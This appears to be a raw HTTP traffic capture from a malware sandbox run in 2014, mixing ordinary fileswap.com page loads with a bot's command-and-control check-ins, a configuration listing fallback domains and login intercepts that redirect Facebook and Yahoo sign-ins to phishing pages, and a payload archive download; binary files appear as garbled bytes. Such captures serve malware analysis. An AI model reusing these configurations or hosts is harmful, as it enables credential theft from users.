?E\..........l.e..Q...... .....Zdropbox.zip..................................~'.8..N....w..W.4.......{M..... E.K@...?k.:..@.W..v..$'E......tV..b...T......e....>jo..*..F.<c.(....:..^?..j.....n-..h....q...ju.$.;.[..F..""..lg.~.......6..M.=p7..F..$../R*...E..th<......>.nl:3.........>..'.c.sg.Em..".zV....~o}.....=.OyO...0..vR..O......n<..... E...._.-.C*. r...S.....S PC~l......&.A..rG.l.X...e2...`..^.....ZQ.8.B.t...~....S.&.| J.00[.c....%|..;.0.|O.OfQ@,..gE..>.x.".X.....U....B..tI.u\.......%.....1I..%...e.Dc..=.s...N....R."...][.........-...Mi......-...'...hd0...x.S.!#.......".wX....e....iS.......r..WO.B>Q......t..Q..p .N .,....o...r..4mV...O.(,"Qy.|...&.hj..."..6F`6.S...#.?....k.......^x.......MLb.-.....Mp..."=\.A...0..=...45...B.......6O..h ...M..!.UC..y.n....2._!..5ks...^W....-. (..v..M...?_%&........p..S..G.!q....VR..V.Dz.w../................P..~v..S.!.j.?.X.S...I.....n..5..bVo.0.(/..P........h....<X...xm.....n.K..=.T......./...,uK....R.c.gbc.7s.......#..J."...Y......]cG*4.pG........J..zm..........X..gV^...uS.=.X..N....1H....b$......~a....q.....E%.........&wh.X .n...tOE;7.K!.Y;...%O.m.............
GET /_js/jquery.js HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://VVV.fileswap.com/
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:11 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 94837
Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT
Connection: keep-alive
ETag: "504e3e8c-17275"
Expires: Sat, 31 May 2014 15:56:11 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
/*! jQuery v1.7.2 jquery.com | jquery.org/license */ (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<" a ">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"") "<html><body>"),cl.close();d=cl.createElement(a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}function cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g ){if(g===1)for(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l " " k,n=e[m]||e["* " k];if(!n){p=b;for(o in e){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=e[j[1] " " k];if(p){o=e[o],o===!0?n=p:p===!0&&(n=o);break}}}}!n&&!p&&f.error("No conversion from " m.replace(" "," to ")),n!==!0&&(c=n?n(c):p(o(c)))}}return c}function ca(a,c,d){var e=a.contents,f=a.dataTypes,g=a.respon
<<
<<< skipped >>>
GET /_images/ico_24_upload.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 1618
Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT
Connection: keep-alive
ETag: "504e3e8b-652"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<...SiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134342, 2010/01/10-18:06:43 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204" xmpMM:DocumentID="xmp.did:DDE02BC3E30C11E1A82DD38E61C78D4D" xmpMM:InstanceID="xmp.iid:DDE02BC2E30C11E1A82DD38E61C78D4D" xmp:CreatorTool="Adobe Photoshop CS5"> <xmpMM:DerivedFrom stRef:instanceID="uuid:54EEA7D7DECDE111A8DDAB7BBB8AB66E" stRef:documentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..Yz....IDATx..VO..a..3..Y.Qw..O....6.0h!.:G.t..V...m/A.=.....K.].x.K......b.[s.E.MqL....\...m5<..7.|.|.{.....o.UUa....e....`...."D...|#"..D.B(...Q.3p.Z......T...w..N....tC...F.....n....P(.=...a.@z..........9.X..........L^h.j.....D.b3.. .*..j.(.....P(..hl.;._.l.'...y.v...h@E.`...A..m.DQ.(.J...*l..p..ci...>..R...6EZ )........1.s.aV.n..X.. .T*.Hl|.h.%..v(.7p.L[8.~...c.G6@".2l.L@l.5.;...ak..9......^.....2.E.;e.....>b..D...';.l..`.......)...&..$g .).*S......j.......(...#..U...k....$I...a...S..j...N].....F.....y..l.N...:G..0....IQ..D..ln..3
<<
<<< skipped >>>
GET /_images/header_bg.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 151
Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT
Connection: keep-alive
ETag: "504e3e8b-97"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR.......\..... gH.....tEXtSoftware.Adobe ImageReadyq.e<...9IDATx.b...?.....#.........&G..s.e#cd1llB........L3s........cp........IEND.B`.....
GET /_images/login_highlight.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 124
Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT
Connection: keep-alive
ETag: "504e3e8c-7c"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR.............L.W.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b....^&. ..o..b..b..................IEND.B`.....
GET /_images/home/home_upload_01.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/jpeg
Content-Length: 53109
Last-Modified: Thu, 13 Sep 2012 20:34:28 GMT
Connection: keep-alive
ETag: "50524354-cf75"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
......Exif..II*.................Ducky.......P.....&Adobe.d...............3...P~...D...s............................................................................................................................................%............................................................................................... 0!.2.P`1"..35#4%$@.A.......................!1...Q2..5 0Aaq."34.`.....BRr...#s.Pb.t..CS.$D.@.c....Td....................1.!.0`. @A.2P.Qaq."...Bpr#....................!1Aq..Qa 0........P@`p..........................1.0..(..............V..`...id...%..V.&%@...@.E....E................. .J...A......B. a. .A .$...%sK$.. f.\F..Pd\..cLV..e .....x.V...-......%a............H.......P.....l.Iy@...yo. ..g..F.X....*5......J5....K.Q..X.1.d! X..^Y...... ......P............T.....e.J...^Q%,..ifUa..2K.Y5.....IF.X.61..Ml..>9\..4.&i......Id.EQ..@...................H....X....&I@.d.L.!D...~..{|&._9...>0....\..L..o...f....r...`.....a...P ....I.......@......e.."...L.H.............(..X.2.....{>......3..}.>..?.....X....X4..Z].s&.X....Ye.S,".\ni..f...e.(.b.,.L...A.....2J......P....(...V@.%@...$.../.Yd..l./f......4......u..>$./...*Y..z..'W=.<....<.w.......U4..v.~.W..k...>7..P..X..;5...Fi..TLv@...H..J................I.....$.0..$.I.[(.b.....w.N.....y.w1...:7}1.......Y..%.8.=.....V.....;...<w........}%..G.^...i.....o....Z\vj...%.(..X..^[..U*...... .....L.,...H..A.....&P".v.2K.Y*a..l.......%.y>..z..1}...e..2.4n.g.._c./O....H............F....._.}?7.|._[<z._&.9p{....m\.....<.Q0e `..$.A.l.E..%
<<
<<< skipped >>>
GET /_images/home/home_signup_button.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 4264
Last-Modified: Mon, 10 Sep 2012 22:54:03 GMT
Connection: keep-alive
ETag: "504e6f8b-10a8"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR....... ........?....tEXtSoftware.Adobe ImageReadyq.e<...JIDATx..].tT......d..d2y.I&...$.W.AQ..U.z..]..]...........]W.Vm.....l-.l..Q.......H..G.H L..I.=w.sr..3s&.n.....vf.~..........T[".P.......u$U.....W.....9..}.>h..'.;.. ..n..ld;R.R..6)...n.T.<.ZuhmM........l...<.3..ME..>.....X....$..FX........un..EX7.|.ZO...(...........9.?...*Gy...a.Z(P......V............0..}.w.T9..)..@A4.^0..R........ ..@A4..r(.C..i..P,...1..h..0q..f(P r..^\....U.i....z..j(....k.M..eCF.6..h.....a>c.y......n.:...D..LM.......A........a.~.W....?.i.m..^..........r..&:1.V.....3pm.9ay.-........|x~ a..........{<d....`X{.......`..g...2#.#.....'.O:w...An...[u.Q.X...E...t."/.*R".P._..K...y.......*.......o...em{\~0........I...M_.[%.D.w....g.p../#baw(...s.v...U...;.2G2j....X.(.}....fO>....A..4...zr.EQ.0cI.0v..X....f2...M....[%.N<5C.....'(...h.B@..n../....q#........|...........w.L.._.5.2.U.S.>.....w{q._o.I...|..7..(.$1yu...c%4.... "..WA....C=.....Z.....N.........=H....f.k..'....H....\,.LA......T...'....5I.n...-.sv..">.{..UnC.[u..9.Z4.;...1....m......._.@p...Ys..-Qm.M...2;...5..F........NtI...u.......*...Z.e.ol!TE..?...Vo........X:.......Fp.=.._...O9b..q.8n.*E.....G.OI...U4.T9.....t...G..@..W..z..%.|...al..q..#...Ez.I...#....;.....:.u..xy.b.......jj9B#.W..........<8;..........23....St.h....|....L.P.......b\..>....}....3.X.........e..#.4...B.zlW....I............U....q......r.5.....(".<. g9..a@.V....)..{'.|YC..'....Uf.^.Y&@.....D.X.eb..............*q...K...I..c}M....Ax....?l.m.#(.....A-.zm..-..Q....
<<
<<< skipped >>>
GET /forum/search.php?method=checkport&port=48744&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: wellshirt.net
HTTP/1.0 502 Cannot find server.
Date: Fri, 30 May 2014 15:55:57 GMT
Server: YTS/1.20.28
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 2477
<HEAD><TITLE>Cannot find server.</TITLE></HEAD>.<BODY BGCOLOR="white" FGCOLOR="black">.<FONT FACE="Helvetica,Arial"><B>. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html><head><style>a:link {font:8pt/11pt verdana; color:red}a:visited {font:8pt/11pt verdana; color:#4e4e4e}</style><meta HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"><title>Cannot find server</title></head><body bgcolor="white"><table width="400" cellpadding="3" cellspacing="5"><tr><td id="tableProps2" align="left" valign="middle" width="360"><h1 id="textSection1"style="COLOR: black; FONT: 13pt/15pt verdana"><span id="errorText">The page cannot be displayed</span></h1></td></tr><tr><td id="tablePropsWidth" width="400" colspan="2"><font style="COLOR: black; FONT: 8pt/11pt verdana">The page you are looking for is currently unavailable. The Web site might be experiencing technical difficulties, or you may need to adjust your browser settings.</font></td></tr><tr><td id="tablePropsWidth" width="400" colspan="2"><font id="LID1"style="COLOR: black; FONT: 8pt/11pt verdana"><hr color="#C0C0C0" noshade><p id="LID2">Please try the following:</p><ul><li id="instructionsText1">Click the Refresh button, or try again later.</li><li id="instructionsText2"> If you typed the page addr
<<
<<< skipped >>>
GET /ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: NID=67=t8o-Zui-3gnP-ve0tH7WYex-hn4pMhm1EpKCxI3m5PBHcFBoMJo8aCL-teIkHsnvONZxZ0L-zJqhyD35HUtVVcDze46xFBGVMiMbFC0VCvHVInY6KocRSe79gKG2PLsO
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.google.com
HTTP/1.1 302 Found
Location: hXXp://VVV.google.ca/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351&ipr=y
Cache-Control: private, max-age=43200
Date: Fri, 30 May 2014 15:56:12 GMT
Expires: Fri, 30 May 2014 15:56:12 GMT
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: adclick_server
Content-Length: 424
X-XSS-Protection: 1; mode=block
Alternate-Protocol: 80:quic
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.ca/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351&ipr=y">here</A>...</BODY></HTML>....
GET /forum/search.php?method=all&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: wellshirt.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:56:09 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
ping.5.FLAG cfg.215."westweight.net" "watchstand.net" "spendstudy.net" "southblood.net" "deadtomorrow.net" "signarmy.net" "saltsecond.net" "wifeknew.net" "ringfirst.net" "rockknew.net" "hangclock.net" "pointdeal.net" "lasopeidres.com" var_user_ip.560.%invite_cc% = "1";.ºn_contact% = "1";.%live_link% = "hXXp://helpdesk.corp.ebay.com/chat.php?id=4094&sess=2eb56a4ecf4b19a9afea607c2a27c8ec&talk=1";.ëaylive% = "middleevery.net";.%set_intercepts% = ""VVV.facebook.com" "middleevery.net" "/fb_login/" "/login/" "1" "facebook.com" "middleevery.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "middleevery.net" "/yahoo/" "/config/" "0" ";.Þp_host% = "middleevery.net";.Þp_path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%state% = "BU";.%cpuinfo% = "Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)";..............
GET /fb_login/index_files/YpD-WuoLxM8.js?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://middleevery.net/fb_login/
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 02 Apr 2013 04:17:16 GMT
Accept-Ranges: bytes
Content-Length: 61686
Content-Type: application/x-javascript
Age: 0
Connection: close
Server: YTS/1.20.28
/*1364677351,173213727*/..if (self.CavalryLogger) { CavalryLogger.start_js(["6Ozhu"]); }.....self.__DEV__=self.__DEV__||0;....if(JSON.stringify(["\u2028\u2029"])==='["\u2028\u2029"]')JSON.stringify=function(a){var b=/\u2028/g,c=/\u2029/g;return function(d,e,f){var g=a.call(this,d,e,f);if(g){if(-1<g.indexOf('\u2028'))g=g.replace(b,'\\u2028');if(-1<g.indexOf('\u2029'))g=g.replace(c,'\\u2029');}return g;};}(JSON.stringify);........(function(a){if(a.require)return;var b=Object.prototype.toString,c={},d={},e={},f=0,g=1,h=2,i=Object.prototype.hasOwnProperty;function j(s){if(a.ErrorUtils&&!a.ErrorUtils.inGuard())return ErrorUtils.applyWithGuard(j,this,arguments);var t=c[s],u,v,w;if(!c[s]){w='Requiring unknown module "' s '"';throw new Error(w);}if(t.hasError)throw new Error('Requiring module "' s '" which threw an exception');if(t.waiting){w='Requiring module "' s '" with unresolved dependencies';throw new Error(w);}if(!t.exports){var x=t.exports={},y=t.factory;if(typeof y==='string'){var z='(' y ')';y=eval.apply(a,[z]);}if(b.call(y)==='[object Function]'){var aa=[],ba=t.dependencies,ca=ba.length,da;if(t.special&h)ca=Math.min(ca,y.length);try{for(v=0;v<ca;v ){u=ba[v];aa.push(u==='module'?t:(u==='exports'?x:j(u)));}da=y.apply(t.context||a,aa);}catch(ea){t.hasError=true;throw ea;}if(da)t.exports=da;}else t.exports=y;}if(t.refcount--===1)delete c[s];return t.exports;}function k(s,t,u,v,w,x){if(t===undefined){t=[];u=s;s=n();}else if(u===undefined){u=t;if(b.call(s)==='[object Array]'){t=s;s=n();}else t=[];}var y=
<<
<<< skipped >>>
GET /fb_login/index_files/276449379149296_646761364.png?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://middleevery.net/fb_login/
Accept: */*
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=864000
Expires: Mon, 09 Jun 2014 15:56:13 GMT
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 981
Content-Type: image/png
Age: 0
Connection: close
Server: YTS/1.20.28
.PNG........IHDR...7...1.....~.1[....IDATh.c...?.9 ,l5.w......;302..c.M............Y........NN%....LL...5............?....9.]i.g.>....(5....?7;.'f.&.&r.....&W/=..31}&.s...p".v.b.|..o/.t.z.nAMe..u.......JL..T......H.A....q,....Y...X...2...D.4t<'".....~..O.9%L..,O....t0. 3.o"..9e.......K.P....h.....M..0R.r.h...L.P.h...H!.Id.........b..\..tT.....i:....d...q6...%..Y~....?...z......>~...Xo.(..r.............._.=...Hx....@K......q...I.#.U.....).N.}...7b...j.J.....JQg...1.ys..A4x...../\..f..e)..c*........Nn"..v&.w.=t. .Cr.q......a.o...."./.a....So......s...#47..h...O.......p.....7'p...3...\|h....${.d9h>.... .C(..p.c..$..dW....4.`......"V.P...?${.ID.\|...4U'$.E.J!..L....L.L4.......LQ..w..AF..y..>.~........A6|.....>...Y...j..., $..N.....MR.W...-..o=.zQ.A\...`}r......#....=. ...|.5u]...3.. ............za1......U.... ..~..3.E........w`M....je.d.!&..g.=?....9tq.|...Yu =.s#.........=7.<.. ..L.TL.R.!...M.....@.$.sC.cDyn.z..9...........AR*..K...P.i..J...@.c..FP......F^E%....IEND.B`...
GET /dep/purple.zip HTTP/1.0
Accept: */*
Connection: close
Host: middleevery.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:55:47 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 20 May 2014 22:57:46 GMT
Accept-Ranges: bytes
Content-Length: 3668848
Content-Type: application/zip
Age: 2
Server: YTS/1.20.28
PK........Sw.D................sasl2/PK........W"CD.@..~...........sasl2/saslANONYMOUS.dll...|T..8..f7..6..... JT4...MX...&A.n..%B.V..R..^..........V[}....C.}j. V..`..* U...6..K5JL6.r...{.f.......y}....{...3g...93s.L..;,6..b.?M.X.Y..y.......i..myi....g]....U..1}C.w......w.u.......6.J.?......Q.....Y{]R......? ....[_4.......z...].|..k)..........b.<..?...z>..w.....%=..{w%.3i.z,...x..[.zMX.%..Q.....V.e...5.~...j.7|..X.-..}Z:.:.(8.J..z...?..Y-......2..MVK.v.f..Z.D...b.%...|C.ux...[....:i.....A'..j..'.bY}].....,..n4.>..7.G...].G.<:.~v@.Xx....t]........d..........D.....h..(.|..... .....`.|.<..7.....z..%..K....X;..t...4......Z.G.....GP..........!..WG..l..?.wekF.E.........mT.:..I9!...bUK)[..Vw...eS...`...79Td....[9h.....m..#D...5@......Q.2.?XQ..J|.e...j.N.ag....W...d_..Q....H.v.,V...2...1.c... }...dI.......-..."U.HV ...t."C...V,kK..@...U-H[.. ....:q..U1......^....Gy_.c...}].y.w.w.l.p....p....l.....gP....y.!.G.....U.*._...B;Y>DK..H......@.Q...g.QD|sV........ZhW. ..F.u.S.....6.A.>#..E}F.>.g..GI){.^|........2...:...H..(M.5M.....p.....@..[.z.>....A.......MU'.<....R:...jg?%.#@v.....s]..(.r..n.|X..C..}.....1.p...{xK*. ..yG.4...@...i......!.ai. ...q..`....#..T..Zn.h........*.Av...Oi1..HD..e...\..|..[......=;U....!...y..B....~v.J_.../`c....m..........#X6..B.2f.,..R1/..Z.1...H.V'.f4<.1..C.....B.gX.[.{C......8J..q..qb.?.P.w.RK.g.....q...i.{.#....y.]....5...{../..YKC....|Y2 *.B.P.@......\M....g....a..-.P...y..8.b.;.M.....@..JSY..u... P...... ..S..h..._./._..........$......a....../.c...v.o.....>..
<<
<<< skipped >>>
GET /fb_login/index_files/276449379149296_1538611903.png?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://middleevery.net/fb_login/
Accept: */*
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=864000
Expires: Mon, 09 Jun 2014 15:56:13 GMT
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 1490
Content-Type: image/png
Age: 0
Connection: close
Server: YTS/1.20.28
.PNG........IHDR...,...-.............IDATX...kLTG...k...\X.)Oy...P..P,.....}.....P......6.....I.c.MZ...h..`.VZ.....Q.-.....C...Zv.n.Ywnn..w..2...9s....s..0..f..[..[.\.E.r(....T..P6.{...;s.~..j.8.a... .........K..j......8i.....9.......Zj.d.. D...`NM..0:.&x...h...Y9........u.....w.8..0 .bti0XJBx...H5.........R..I%...S#.t.{W...P..l2.)j..x.O...s..8JUKG*.H.\u`..<....%..R...Q.X>.,V1.t.V.*0...nf.rok..dRW#W..U6|.^d-{h..r...g.0.n.6....Y.PES..~l.5......;.&>.r...9u.....5............1.-..-...E....,.[.PY.........TW......4....ud..Ni...%.....>1.%..D..0;.e..I..... w.{;.8=....f..........P.\rb......m.6....i0).Q..a..0.`.=.............ov}......OYqzFq.....{.L..1...e..A.. . ;~Z.....eb`^.d%....|.....c.....~>77.e.I.E....S.hti.@..0.,4..........).rk.7pq........ ......e(X&........<......I.%E.>.s..*J7..?.1.(@......Mm........_5.;......el.5......94HG.Vf..G....B..@z..UU.......;...f..../`..D..K\...a{.....7......9..A*.bB......M......jb........{.....Y .<..).e..).l.y............kY .x.G..U/6^....^./..'...h4I.~E...E.......^...\......;.v......J..L...\...{A_..BFd.......M.{.......M>=..b!.q..g&$o.K....[.....x...D.........vw...;R.......g.>&.)(...n.6.!......;..;...;.....B..\..`....t.6,.Us...}.......)UK~}..S8.J,...........&..nb...u.F.a.w%.$..P.Z......phx.N.aJ......h...D~7.&..../).b.6...WGw\E... ... ...e..4.,49.J......i..~I.VQk.....v`i.HK......*4X.........L.L.R..{.....r.c". ...b~f\.;.Om.|.>.. .Ug.).../.....$.A....'.........3a.6.=q.....).a.g.z..w\a.A..........I0.|...!..K...PQ.!.i..CNA.:....].2S.|.<....IEND.B`...
<<
<<< skipped >>>
GET /ext/swfupload/handlers.js?v=ebg HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://VVV.fileswap.com/
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:11 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 14901
Last-Modified: Thu, 29 Nov 2012 17:57:20 GMT
Connection: keep-alive
ETag: "50b7a200-3a35"
Expires: Sat, 31 May 2014 15:56:11 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
